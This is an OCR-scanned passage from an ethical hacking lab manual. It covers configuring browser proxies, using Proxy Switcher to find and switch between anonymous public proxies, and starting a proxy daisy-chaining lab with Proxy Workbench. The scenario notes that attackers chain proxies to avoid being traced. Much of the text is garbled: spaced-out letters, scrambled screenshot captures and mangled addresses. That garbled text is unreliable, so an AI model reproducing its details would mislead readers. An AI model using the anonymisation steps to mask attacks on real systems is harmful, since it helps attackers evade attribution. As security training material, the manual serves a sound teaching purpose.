Offline Web Content and User Data
You 1 application cache is c j i ie n t l / using 0 bytes 0 1 disk space
M Tell me when a wefccite aclrt to store Hat* for offline uce
The follov/ing tvebsites aie a lowed to store data for offline use
Bar eve..
HelpCancelOK
F IG U R E 1 2 2 F ire fo x N e tw o rk Settings
7 . S e le c t d ie Use System proxy settings r a d io b u t t o n , a n d c l i c k OK.
C3 Often different internet connections require completely different proxy server settings and it's a real pain to change them manually
k׳3 P ro x y S w itch e r fu lly co m p a tib le w ith In te rn e t E x p lo re r, F ire fo x , O p e ra an d o th e r p rog ram s
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 202
M odule 03 - S can n in g N e tw o rk s
־ י י Connection SettingsיConfigure Poxies to Access the Internet
O No prox^
Auto-detect proxy settings fo (־' r this network
(•) Use system proxy settings
M anua l proxy configuration :
HTTP 5rojjy: 127.0.0.1
@ Uje this prcxy server fo r all protocols
P firt
Port
Port
SSLVoxy: 127.0.0.1
FTP *roxy. 127.0.0.1
SOCKS H ost 127.0.0.1
O SOCKS v4 ® SOCKS v5
No Pro>y fo r
localhcst, 127.0.0.1
Reload
Example: .mozilla.org, .net.nz, 192.168.1.0/24
O Automatic proxy configuration URL:
HelpCancelOK
f i proxy switcher supports following command line options:
-d: Activate direct connection
F IG U R E 12.3: F ire fo x C o n n ection Settings
8 . N o w t o I n s t a l l P r o x y S w i t c h e r S t a n d a r d , f o l l o w t h e w i z a r d - d r i v e n
i n s t a l l a t i o n s te p s .
9 . T o l a u n c h P r o x y S w i t c h e r S t a n d a r d , g o t o S ta rt m e n u b y h o v e r i n g d i e
m o u s e c u r s o r i n d i e l o w e r - l e f t c o r n e r o f t h e d e s k t o p .
F IG U R E 124: W m dcKvs Server 2012 - D esk to p v iew
1 0 . C l i c k d ie Proxy S w itcher Standard a p p t o o p e n d ie Proxy Sw itcherw in d o w .
O R
T A S K 1
Proxy Servers Downloading
C l i c k Proxy S w itcher f r o m d ie T r a y I c o n l is t .
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 203
M odule 03 - S can n in g N e tw o rk s
S t a r t A d m in is tra to r ^
Server Windows Google Hyper-V GlobalManager RowerShetl Chrome Marvager Network
Inventory
F s b W * 9 1 S I
Compute Control Hyper-VPanel
Machine... Centof...
y v 9 K
. Command M021I4 PKKVSw*Prompt F refox
v r r <0 *£«p«- *
ProxyChecker
CM*up , י ►ר.
F IG U R E 125: W in d o w s Se rve r 2012 - A p p s
s S e r v e r .
at* o
Customize... j a t e D a t a c e n t e r
A / Q \ t— 1 l A r - r ״1׳ / ! ^ D p ^ u i l d 8 4 0 0
F IG U R E 126: Se lect P ro x y Sw itch er
1 1 . T h e Proxy L is t Wizard w i l l a p p e a r as s h o w n i n d i e f o l l o w i n g f ig u r e ; c l i c k
Next
Eth ica l Hacking and Countermeasures Copyright O by EC Coundl־A ll Rights Reserved. Reproduction is Strictly Prohibited
£□ Proxy Switcher is free to use without limitations for personal and commercial use
ם i f th e se rve r b ecom es in access ib le P ro x y S w itch e r w ill try to fin d w o rk in g p ro x y se rve r ־ a red d ish b ack g ro u n d w ill be d isp laye d t ill a w o rk in g p ro x y se rve r is fo u n d .
C E H Lab M anual Page 204
M odule 03 - S can n in g N e tw o rk s
£3 Proxy Sw ־ itcher ssupports fo r LAN, dialup, VPN and o ther RAS connections
1 2 . S e le c t d ie Find New Server, Rescan Server, Recheck Dead r a d io b u t t o n
f r o m Common Task, a n d c l i c k Finish.
& Proxy ־sw itch ing from command line (can be used a t logon toau tom atica lly setconnectionsettings).
13 . A l i s t o f downloaded proxy servers w i l l s h o w i n d ie l e f t p a n e l .
Proxy List Wizard
Uang this wizard you can qcackly complete common proxy lot managment tasks
Cick finish to continue.
Common Tasks(•) find New Servers. Rescan Servers. Recheck Dead
O Find 100 New Proxy Servers
O find New Proxy Severs Located in a Specific Country
O Rescan Working and Anonymous Proxy Servers
CanedFinish< Back0 Show Wizard on Startup
F IG U R E 12.8: Se lect com m on tasks
Proxy List Wizard
Welcome to the Proxy Switcher
Using this wizard you can quickly complete common proxy list managment tasks.
To continue, dick Next
CancelNext >@ Show Wizard on Startup <Back
F IG U R E 127: P ro x y L is t w izard
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 205
M odule 03 - S can n in g N e tw o rk s
I MProxy Switcher Unregistered ( Direct Connection ]
File Edit Actions View Help
Filer Proxy Serversא
ARoxy Scanner Serve* State ResDDnte Countiy
M * New (683) , ? 93.151.160.197:1080 Testino 17082ns H RJSSIAN FEDERATIONB &־ high Aronymsus (0) £ 93.151.1€0.195:108Q Teetirg 17035n« m a RJSSIAN FEDERATION
SSL (0) 93.150.9.381C80 Testing 15631ns RJSSIAN FEDERATION£ : Bte(O) knnel-113-68vprforge.com Lhtested
i מ Dead (2871) , f 93 126.111210:80 Lhtested * UNITED STATES2 Permanently (656?) £ 95.170.181 121 8080 lht*ct*d m a RJSSIAN FEDERATION
1— Book. Anonymity (301) < Cו 368 95.159 ? Lhtested “ SYR;AM ARAD REPUBLIC£־ ן—-5 Pnva!e (15) 95.159.31.31:80 Lhtested — b ׳ KAN AKAB KtPUBLIt
V t t Dangerous (597) 95.159 3M 4 80 Lhtested “ SYRIAN ARAB REPUBLICf~־& My P0׳* / Servere (0) , f 94.59.250 71:8118 Lhtoetod ^ 5 UNITED ARAB EMIRATES:— PnwcySwitchcr (0) * - ................ __ Lt itcatgd___ C UNITED AR\B EMIRATES
Caned
Fbu׳»d1500
MZ3 28 kb
ProgressStateConpbte
Conpfcte
S te f r e Core PrcxyNet wviw .ali veoroxy .com mw .cyberayndrome .net״
<w!w nrtime.com
DL&F IG U R E 129: L is t o f dow nloadeed P ro s y Server
1 4 . T o stop d o w n lo a d in g d ie p r o x y s e r v e r c l i c k
L= Jg ' x 1Proxy Switcher Unregistered ( Direct Connection )
File Edit Actions View Help
«filer Fox/ Servers
r
Couriry J HONG KONG | ITALY
»: REPUBLIC OF KOREA “ NETHERLANDS !ITALY
™ UNITED ARAB EMIRATES •: REPUBLICOF KOREA 5 SWEDEN“ SYRIAN ARAB REPUBLIC ” SYRIAN ARAB REPUBLIC — CZECH REPUBLIC
Serve* Slate Resronte£ tw n«t (Aliv«-$SL) 13810nt»«* ־1€ 48 147 001 £ lml5+1S»-11065.a«vwd» (Alive-SSL) 106Nh*£ 218152.121 184:8080 (Alive-SSL) 12259ns£ 95.211.152.218:3128 (Alive-SSL) 11185ns£ 95.110.159.54:3080 (Alive-SSL) 13401ns£ 9156129 24 8)80 (Alive-SSL) 11&D2ns
u>4 gpj 1133aneunc co (Alive-SSL) 11610mpjf dsd»cr/2'20Jcvonfcrc com: (.*Jive-SSL) 15331ns
91.144.44.86:3128 (Alive-SSL) 11271ns£ 11259ns (Alive-SSL.) נ80&:91.144.44.8$
11977ns (Alive-SSL) ר־ :92.62.225.13080
Proxy Scanner ־♦ N#w (?195)
H \y Aicnymouo (0)I••••©׳ SSL (0)
| fc?Bte(0)B ~ # Dead (1857)
=••••{2' Permanently 16844] Basic Anonymity (162)
| ^ Private (1) j - &־ Dangerous \696) h &־ My Proxy Servers (0J - 5 ProocySwtcher (0) ׳{־
Cancel
V
Keep Ali/e Auto Swtcf־DsajleJ
108 21.5969:18221 tested 09 (Deod) becousc ccrreoon bmed out 2 ' 3.86.4.103.80 tested as [Deod] because connection lifted 0U 123.30.188.46:2214 tested as [Dead] Decause ccnrecaon tuned out. 68 134253.197 5563tested as [Dead] because connection •jmed out.
F IG U R E 1210: C lic k o n S ta rt button
1 5 . C l i c k Basic Anonymity i n d ie r i g h t p a n e l ; i t s h o w s a l i s t o f d o w n lo a d e d
p r o x y s e rv e rs .
W h e n P ro x y S w itch e r is ru n n in g in K u fh A U ve
m o d e it trie s to m a in ta in w o rk in g p ro x y se rve r co n n e c tio n b y s w itch in g to d iffe re n t p ro x y se rve r i f cu rre n t d ies
W h e n a c tiv e p ro x y se rve r b ecom es in access ib le P ro x y S w itch e r w ill p ick d iffe re n t se rve r fro m P ro x y S w itc h e r c a te g o ry I f th e a c tiv e p ro x y se rve r is cu rre n tly a l i v e th e b ack g ro u n d w ill b e g reen
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 206
M odule 03 - S can n in g N e tw o rk s
| _ ; o ^Proxy Switcher Unregistered ( Direct Connection)
KFile Edit Actions View Help
& s► □ x I a a ag? Proxy Scanner Server State RespxKe Countiy
j ~ # New (853) , f 91 14444 65 3128 (Alve-SSU 10160ns — SvRAfi ARAB REPUBIB &־ Anonymous (0) <f 119252.170.34:80.. (Aive-SSU 59/2rre INDONESIA
h & SSL(0) , f 114110*4.353128 (Alve-SSL) 10705ns ^ INDONESIABte(0) f 41 164.142.154:3123 (Alve-SSU 12035ns ►)E SOUTH AFRICA
«־■ -& Dead (2872) ,f 2כי149101 10? 3128 Alve 11206ns m BRAZILFemanently (6925) , f 2D3 66 4* 28C Alvo 10635n• H iTA IV /AM
1513 ■ י'‘... >>" 1 ־"׳ , f 203 254 223 54 8080 (Alve-SSL) 11037ns REPUBLIC OF KOREA\— Pnvale (16) <f 200253146.5 8080 Alve 10790ns pg BRAZIL;—£5 Danoerous (696) <f 199231 211 1078080 (Alve-SSU 10974m\ & My Proxy Sorvoro (0) , f 1376315.61:3128 (Alve-SSU 10892m gq brazil
־■- ProxySwltcher (0) i f 136233.112.23128 (Alve-SSU 11115ns ס נ brazil< 1 ■1
Caned
Keep Alive AUd Swtd־Cis^bled
177 38.179.26 80 tested as [Alwe! 17738.179.26:80 tested as [(Aive-SSU] 119252.170.34:80 tested a< (Alive]119252.170.34.80 tested as [(Alive-SSL)]
33/32ISilli& SSitSiSkF IG U R E 1211: Se lecting dow nloaded P ro x y server from B as ic A n o n ym ity
1 6 . S e le c t o n e Proxy server IP address f r o m r i g h t p a n e l t o s w ic h d ie s e le c te d
p r o x y s e r v e r , a n d c l i c k d ie ic o n .fTJ
f l i ta (3 P ro x y S w itc h e r U n re g is te re d ( D ire c t C o n n e c tio n ) 1 ~ l~a ! *
File Edit ,Actions View Help
3 ׳# □ n [ a a. a a if j \ 2 \ y A Li s | /י | Proxy S«rvera | X j
State He> ponte Lointiy(Alve-SSU 10159ms “ SYRIAN ARAB REPUBLIC(Alve-SSL m־5 131 [ J HONG KONG(Alve-SSU 10154TBS 1 | ITALY
Alh/e 10436ns REPUBLIC OF IQOREA(Alve-SSU 13556ns ;-S W E D E N(Alve-SSL:• n123me 1 ITALY(Alve-SSU 10741ns(Alve-SSU 10233ns ------NETHERLANDS(Alve-SSU 10955ns REPUBLIC OF KOREA(Alve-SSL) 11251m “ HUNGARY(Alve-SSU 10931ns ^ ^ IR A C(AlveSSU 15810ns S3£5 KENYA(Alve-SSU 10154ns “ SYR AN ARAB REPUBLIC
Server91.14444.65:3123 ,f
f 001.147.48.1 U.ctabcrct., 95.aemef.&־ל 1־?, lx>stS4159
218.152.121.184:3030 ,f
95.110159.5450803 i.5 6 .2 ..(:S.2-i.8GS־
i f 95.211152.218:3123 f u54jpj1135aTTSjno coJcr:• , f 91.82.65.173:8080 <f 86.1111A4.T94.3123
$ 4ד .89.130.23128,f 9ו 14444 86 3123
£5 Px»y Scanner (766) New ל * •••J
(0) rtgh Anonymous <0)SSL&(0)01 B1te־־;(2381) Dead & } ־ :
(6925) Pemanently..........'467) Basic Anonymity
(116 ate׳ Pn ־ &h ־ Dangerous (696׳! ־ &j
(0) Proxy Ser/ere ־&r (0) ProxySvtitcher—:
Ctaeblcd [[ Koep Alive ][ Auto Swtch |
P׳־
218 152. 121.I84:8030tested as ((Alve-SSL:]218.152.121.184:8030 tested as [Alive]ha*»54-159-l 10-95 senieriedieati amba it 8080te**d » (׳Alve-SSL)] 031.147.48.1 K>.«atb.net/ig3tor.com:3123 teatsd 05 [(ASve SSL)]
F IG U R E 1 2 1 2 Se lecting the p rox y server
1 7 . T h e s e le c te d proxy server w i l l c o n n e c t , a n d i t w i l l s h o w d ie f o l l o w i n g
c o n n e c t i o n ic o n .
£z־ When running in A u t o S w i t c h mode Proxy S w itcher w ill sw itch active proxy servers regularly. Sw itch ing period can be set w ith a s lide r from 5 m inutes to 10 seconds
^ In a d d itio n to stan d ard ad d / re m o ve / e d it fu n c tio n s p ro x y m anager co n ta in s fu n c tio n s u se fu l fo r an o n ym o u s su rfin g and p ro x y a v a ila b ility te s tin g
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 207
M odule 03 - S can n in g N e tw o rk s
Proxy Switcher Unregistered ( Active Proxy: 95.110.159.54:8030 ־ ITALY) I ~ l ם f xp F ikFile Edit Actions View Help
$5 Proxy Scanner Serve! State Response ComtiyH * New !766) ^91 .14444 65:3123 (Alve-SSU 10159ms “ SYR AN ARAB REPUBLIC
Ugh Anonymous (0) 001.147.48. ilS.etatic .re t.. (Alve-SSU 13115n* [ J HONG KONG• g t SSL(O) , ? host54-159-110-95.server.. (Alve-SSU 10154ns | |ITALYH 2? a te (0» & 218.152.121.1(4:3080 Alive 10436ms > : REPJBLIC OF KOREA
B - R Dead (2381) , f dedserr2i23Jevonlme to n (Alve-SSU 13556ms ■■SWEDENP»m*n#ntly (G975) L 95 110159 54 8080 (Alve-SSU 11123™• I ITAtr
• fy .״003 Anonymity (4G7) (Alve-SSU 10740ms UNI ILL) ARAD CMIRATCSPnvate (16) , ? 95 211 152 21( 3128 (Alve-SSU 10233ms “ NETHERLANDS
| 0 ׳Dangerous (6961 ־־ u54aDJl133a׳r»unfl,co.kr:l (Alve-SSU 10955ms REP JBLIC OF KOREAl״ & My Proxy Servere (0) , f 91 82 £5 173:8080 (AlveSSU 1l251r»a “ HUNGARY
:—ProxySviitcha 25־ (0) g 86.111 144.194.3128 (Alve-SSU 10931ms “ IRAG, ? 41.89.130^3128 (Alve-SSU 158101s g g K E N rA£ 91 14444 86 3123 (Alve-SSU 10154ns “ SYRIAN ARAB REPUBLIC
< I ״י
Dsebicd 11 Keep Alive | [" Auto Switch
2l8.152.121.1&4:8030tested as [fAlve-SSL!218.152.121.184:8030tested as (Alive]host54-159-110-95 9»rverdedicati arnba 8080 ג tested as RAIve-SSL)] 031.147.48.116.atotc.nctvigator.con>:3123tested09 [(Mrvc SSL))
M LEauc Anonymity
F IG U R E 1213: Su ccesfiil co nnection o f selected p roxy
1 8 . G o t o a web browser ( F i r e f o x ) , a n d t y p e d ie f o l l o w i n g U R L
h t t p : / / w ^ v . p r o x y s w i t c h e r , c o m / c h e c L p h p t o c h e c k d ie s e le c te d p r o x y
s e r v e r c o m ie t i v i t y ; i f i t is s u c c e s s fu l ly c o n n c t e d , t h e n i t s h o w 's d i e f o l l o w i n g
f ig u r e .
r 1 ־0 Cx 1Detecting your location M07illa Firefox3 ? £ri!t ¥"■'״' History BookmorH Iool*• Jjdp
C *‘I Go®,I. f i f !
0*r»<ring your kxatkm..
IUU-..J.UU,I.- ־4
2 02 .53 .11 .130 , 192 .168 .1 .1
U nknow nYour possible IP address is:
Location:
Proxy Information
Proxy Server: DFTFCTFD
Proxy IP: 95.110.159.67
Proxy Country: Unknown
F IG U R E 1214: D etected P ro x y server
1 9 . O p e n a n o t h e r ta b i n d ie web browser, a n d s u r f a n o n y m o s ly u s in g d i is
p r o x y .
£□ Starting from version 3.0 Proxy S w itcher incorporates internal proxy server. It is useful when you w an t to use other applications (besides In ternet Explorer) tha t support HTTP proxy v ia Proxy Sw itcher. By defau lt it w a its fo r connections on localhost:3128
Eth ica l Hacking and Countermeasures Copyright O by EC Coundl־A ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 208
M odule 03 - S can n in g N e tw o rk s
proxy server Cerca con Google - Mozilla Fiiefox
rlc Edit yie* Histoiy Bookmark: Tools Udp| pray ic־.« - C e r a con GoogleOttecbngyour location..
P *C ־ Gccgie^ <9 wvwv gcogk.it ?hbft&g5_nf=1&pq-proxy 5wt*cr&cp^ 0&g?_<l-22t51.1t>f-taq-pro>fy־»scrvcr&pt-p8b1»-
*Tu Ricerca Immagini Maps Play YouTube Mews Gmail Document! Calendar Utao
proxy server
Proxy Wikipodiait. wkj ped1a.org/tv1k1• PioxyIn informatica e telecomunica^ow un proxy 6 un programma che si mleipone tra un client ed un server farendo da trainee o neerfaccia tra 1 due host owero ...Alt/i usi del termrne Proxy Pioxy HTTP Note Voo correlate
Public Proxy Servers - Free Proxy Server Listivwiv publicpfoxyserveis conV Tiacua questa paginaPublic Proxy Server* is a free and *!dependent proxy checking system. Our service helps you to protect your Ktently and bypass surfing restrictions since 2002.Proxy Servers - Sored By Rating - Proxy Servers Sorted By Country - Useful Links
Proxy Server - Pest Secure, rree. Online Proxywvwproxyserver com׳' • Traduci questa pagmaTho boet fin״ Pioxy Sarvef out there* Slop soar chin g a proxy list for pioxies that are never fa»1 or do noi even get onl«1e Proxy Server com has you covered from ...
Proxoit - Cuida alia naviaazione anonima I proxy server
G o o g le
Ricerca
Immagin■
Maps
Video
NooseShopping
Ptu contanuti
ItaHaCamtm localit.l
0 3 A fte r the anonym ous p rox y servers have becom e availab le fo r sw itch in g you can activate an y one to becom e in v isib le fo r the sites yo u v isit.
F IG U R E 1214: S u rf using P ro x y server
L a b A n a l y s i s
D o c u m e n t a l l d i e IP addresses o f live (SSL) proxy servers a n d t h e c o n n e c t i v i t y
y o u d is c o v e r e d d u r i n g d ie la b .
T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c h i e v e d
P r o x y S w i t c h e r
S e r v e r : L i s t o f a v a i la b le P r o x y s e r v e r s
S e l e c t e d P r o x y S e r v e r I P A d d r e s s : 9 5 . 1 1 0 . 1 5 9 . 5 4
S e l e c t e d P r o x y C o u n t r y N a m e : I T A L Y
R e s u l t e d P r o x y s e r v e r I P A d d r e s s : 9 5 . 1 1 0 . 1 5 9 . 6 7
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S
R E L A T E D T O T H I S L A B .
Q u e s t i o n s
1. E x a m in e w h i c h te c h n o lo g ie s a re u s e d f o r P r o x y S w it c h e r .
2 . E v a lu a t e w h y P r o x y S w i t c h e r is n o t o p e n s o u rc e .
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 209
M odule 03 - S can n in g N e tw o rk s
I n t e r n e t C o n n e c t i o n R e q u i r e d
e s0 Y
P l a t f o r m S u p p o r t e d
0 C l a s s r o o m
□ N o
□ iL a b s
Eth ical Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 210
M odule 03 - S can n in g N e tw o rk s
Labw
i1 3
Daisy Chaining using Proxy W orkbenchProxy Workbench is a unique p/vxy server, ideal for developers, security experts, and twiners, which displays data in real time.
L a b S c e n a r i o
Y o u h a v e le a r n e d i n d i e p r e v i o u s l a b h o w t o hide your ac tua l IP u s in g a P r o x y
S w i t c h e r a n d b r o w s e a n o n y m o u s ly . S i m i l a r l y a n a t t a c k e r w i t h m a l i c i o u s i n t e n t
c a n p o s e a s s o m e o n e e ls e u s in g a p r o x y s e r v e r a n d g a t h e r i n f o r m a t i o n l i k e
a c c o u n t o r b a n k d e t a i l s o f a n i n d i v i d u a l b y p e r f o r m i n g soc ia l eng ineering. O n c e a t t a c k e r g a in s r e le v a n t i n f o r m a t i o n h e o r s h e c a n h a c k i n t o t h a t
i n d i v i d u a l ’ s b a n k a c c o u n t f o r o n l i n e s h o p p in g . A t t a c k e r s s o m e t im e s u s e
m u l t i p l e p r o x y s e r v e r s f o r s c a n n in g a n d a t t a c k in g , m a k in g i t v e r y d i f f i c u l t f o r
a d m in i s t r a t o r s t o t r a c e d i e r e a l s o u r c e o f a t t a c k s .
A s a n a d m i n i s t r a t o r y o u s h o u ld b e a b le t o p r e v e n t s u c h a t t a c k s b y d e p lo y i n g a n
i n t r u s i o n d e t e c t i o n s y s te m w i t h w h i c h y o u c a n c o l l e c t n e t w o r k i n f o r m a t i o n f o r
a n a ly s is t o d e t e r m in e i f a n a t t a c k o r i n t r u s i o n h a s o c c u r r e d . Y o u c a n a ls o u s e
Proxy W orkbench t o u n d e r s t a n d h o w n e t w o r k s a r e s c a n n e d .
L a b O b j e c t i v e s
T h i s l a b w i l l s h o w y o u h o w n e t w o r k s c a n b e s c a n n e d a n d h o w t o u s e P r o x y
W o r k b e n c h . I t w i l l t e a c h y o u h o w t o :
■ U s e t h e P r o x y W o r k b e n c h t o o l
■ D a i s y c h a in t h e W ’i n d o w s H o s t M a c h i n e a n d V i r t u a l M a c h in e s
L a b E n v i r o n m e n t
T o c a r r y o u t t h e la b , y o u n e e d :
■ P r o x y W o r k b e n c h is lo c a t e d a t D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy W orkbench
I C O N K E Y
2־ 3 V a lu a b le
in f o r m a t io n
T e s t y o u r
k n o w le d g e
ס W e b e x e rc is e
m W o r k b o o k r e v ie w
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 211
M odule 03 - S can n in g N e tw o rk s
Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f P r o x y W o r k b e n c h f r o m
t h i s l i n k h ttp ://p roxyw o rkbench .com
I f y o u d e c id e t o d o w n l o a d t h e l a t e s t v e r s io n , t h e n s c r e e n s h o t s s h o w n i n
t h e la b m i g h t d i f f e r
A c o m p u t e r r u n n i n g W indows Server 2012 as a t t a c k e r ( h o s t m a c h in e )
A n o t h e r c o m p u t e r r u n n i n g W indow Server 2008, and W indows 7 as
v i c t i m ( v i r t u a l m a c h in e )
A w e b b r o w s e r w i t h I n t e r n e t a c c e s s
F o l l o w W iz a r d - d r i v e n in s t a l l a t i o n s te p s t o in s t a l l Proxy W orkbench
A d m in i s t r a t i v e p r iv i le g e s t o r u n t o o ls
L a b D u r a t i o n
T im e : 2 0 M in u t e s
O v e r v i e w o f P r o x y W o r k b e n c h
P r o x y W o r k b e n c h is a p r o x y s e r v e r t h a t d is p la y s i t s d a ta i n r e a l t im e . T h e d a ta
f l o w i n g b e t w e e n w e b b r o w s e r a n d w e b s e r v e r e v e n a n a ly z e s F T P i n p a s s iv e a n d
a c t iv e m o d e s .
L a b T a s k s
I n s t a l l P r o x y W o r k b e n c h o n a l l p l a t f o r m s o f d ie W i n d o w s o p e r a t in g s y s te m
W׳ indows Server 2012. W indows Server 2008. a n d W indows 7)
P r o x y W o r k b e n c h is l o c a t e d a t D:\CEH-Tools\CEHv8 M odule 03 Scanning N etw orks \P roxy Too ls\P roxy W orkbench
Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f Proxy W orkbench f r o m
t h i s l i n k h t t p : / / p r o x y w o r k b e n c h . c o m
F o l l o w t h e w i z a r d - d r i v e n i n s t a l l a t i o n s te p s a n d i n s t a l l i t i n a l l p l a t f o r m s
o f W indows opera ting system
T h i s la b w i l l w o r k i n t h e C E F I la b e n v i r o n m e n t - o n W indow s Server 2012, W indow s Server 2008 a י n d W indow s 7
O p e n F i r e f o x b r o w s e r i n y o u r W indows Server 2012, a n d g o t o Tools a n d c l i c k op tions
C E H Lab M anual Page 212 Eth ica l Hacking and Countermeasures Copyright O by EC •CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C Security: Proxy \servers provide alevel o f securityw ith in a -netw ork. Theycan help prevent רsecurity a ttacksas the only wayin to the ne tw ork 4.from the In ternetis via the proxy _server
6.
ZZ7 Tools dem onstrated in th is lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
M odule 03 - S can n in g N e tw o rk s
Google Moiillo Fitefox
fi *e •!1• -■cc9u
Documents Calendar Mote •
Sign n
colt | HtJp
Qownloatfs CW-I
moderns c m * v A*»״
S<* UpS^K.
Web Developer
Page Info
י9 ה י ז 5»ז1£ו1ז(»*6״
Cle«r Recent U stsr. Cl1+“ Sh1ft*IW
♦You Search Images
G o o g le
Gocgie Search I'm feeling Lucky
•Google Aboul Google Google comAtfM«t1«M1g Piogammei Bumoeti SolUion* Piracy t Te
F IG U R E 13.1: F ire fo x options tab
7 . G o t o Advanced p r o f i l e i n d ie Options w iz a r d o f F i r e f o x , a n d s e le c t d ie
N etw ork t a b , a n d d i e n c l i c k Settings.
Options
ם & §י % p 3General Tabs Content Applications Privacy Security S>nc Advanced
| S g tn g i.
Clear Now
Clear Nov/
Exceptions..
General | MetworV j Update | Encryption j Connection
Configure h o * h re fo i connects to the Internet
Cached Web Content
Your web content cache 5י currently using 8.7 M B of disk space
I I Override automate cache management
Limit cache to | 1024-9] MB of space
Offline Web Content and User Data
You 1 application cache is c j i ie n t l / using 0 bytes of disk space
M Tell me when a wefccite aclrt to store data for offline uce
The following websites are a lowed to store data for offline use
Bar eve..
HelpCancelOK
F IG U R E 13.2 F ire fo x N e tw o rk Settings
f t T h e so cke ts p an e l sh ow s th e n u m b er o f A liv e so ck e t co n n ec tio n s th a t P ro x y W o rk b e n ch is m anag ing . D u rin g p erio d s o f n o a c tiv ity th is w ill d ro p b a ck to ze ro S e le c t
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 213
M odule 03 - S can n in g N e tw o rk s
8. C h e c k Manual proxy configuration 111 t h e Connection Settings w iz a r d .
9 . T y p e HTTP Proxy as 127.0.0.1 a n d e n t e r d ie p o r t v a lu e as a י8080 n d c h e c k
d ie o p t i o n o f Use th is proxy server fo r a ll protocols, a n d c l i c k OK.
Connection Settings
Configure Proxies to Access the Internet
8080—
8080y |
8 0 8 0 v
Port
Port
Port
PorJ:
O No prox^
O Auto-detect proxy settings for this network
O ii** system proxy settings
(§) Manual proxy configuration:
HTTP Proxy: 127.0.0.1
@ Use this proxy server for all protocols
SSL Proxy: 127.0.0.1
£TP Proxy: 127.0.0.1
SO£KS H ost 127.0.0.1
D SOCKS v4 (S) SOCKS 5
No Proxy fo r localhost, 127.0.0.1
Example .mozilla.org, .net.nz, 192.168.1.0/24
O Automatic proxy configuration URL
Rgload
HelpCancelOK
F IG U R E 13.3: F ire fo x C o n n ection Settings
1 0 . W h i l e c o n f i g u r i n g , i f y o u e n c o u n t e r a n y port e rror please ignore it
1 1 . L a u n c h t h e S ta rt m e n u b y h o v e r i n g d i e m o u s e c u r s o r i n t h e l o w e r - l e f t
c o r n e r o f t h e d e s k t o p .
4 Windows Server 2012
Waoom W1P iW 2 taene Cjickttr 0 H iK tT rbaLMcn cow tuid MO.
g. - ?•F IG U R E 13.4: W in d o w s Se rve r 2012 - D esk to p v iew
1 2 . C l i c k d ie Proxy W orkbench a p p t o o p e n d ie Proxy W orkbench w i n d o w
S The s ta tus bar shows the deta ils o f Proxy Workbench*s ac tiv ity . The firs t panel displays the amount o f data Proxy Workbench curren tly has in memory. The actua l amount of memory tha t Proxy Workbench is consum ing is generally much more than th is due to overhead in managing it.
S can co m p u te rs b y IP ran g e, b y d o m a in , s ing le co m p u te rs , o r co m p u te rs, d e fin e d b y th e G lo b a l N e tw o rk In v e n to ry h o st file
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 214
M odule 03 - S can n in g N e tw o rk s
ServerManager
WindowsPowerShell
GoogleChrome
Hyper-VManager
Fa m • י וControlPand
W
HyperV Virtual Machine ״
SO I Server
£CommandPrompt
MO? 113 Firefox
Searct101_
H O
Detkc
dobaiNetworkInventory
S i
ProxyWoricbenu.
F IG U R E 13.5: W in d o w s Server 2012 - A p p s
1 3 . T h e Proxy W orkbench m a in w i n d o w a p p e a r s as s h o w n i n d ie f o l l o w i n g
f ig u r e .
H IProxy Workbench
mFile V iew Tools Help
ם ועבש_
K N JH mDetails for All Activity
1 Protocol | StartedToFrom173.194.36.24:80 (www g . HTTP 18:23:39.3^74.125.31.106:80 (p5 4ao HTTP 18:23:59.0־173.194 36 21:443 (maig HTTP 18:24:50.6(173.194.36.21 M 2 (m aig . HTTP 18:24:59.8'173.194.36 21:443 (maig.. HTTP 18:25:08.9־K ־173 M TC. 71 •An (m־d ״ H T T P____ 1 fi־jR -1 fir
JJ127.0.0.1:51199 127.0.0.1:51201
J l l 127.0.0.1:51203 J d 127.0.0.1:51205 J d 127.0.0.1:51207W 'l ! ? 7 n n ו1 ^ ו ל ו
Monitorirg: WIND33MR5HL9E4 (10.0.0.7)
SMTP • Outgoing e-mal (25)^ POP3 • Incoming e-mail (110)& HTTP Proxji • Web (80B0)
HTTPS Proxy • SecureWeb (443)^ FTP • File T!ansfer Protocol (21)
Pass Through ■ For Testing Apps (1000)
3eal time data for All Activity
J
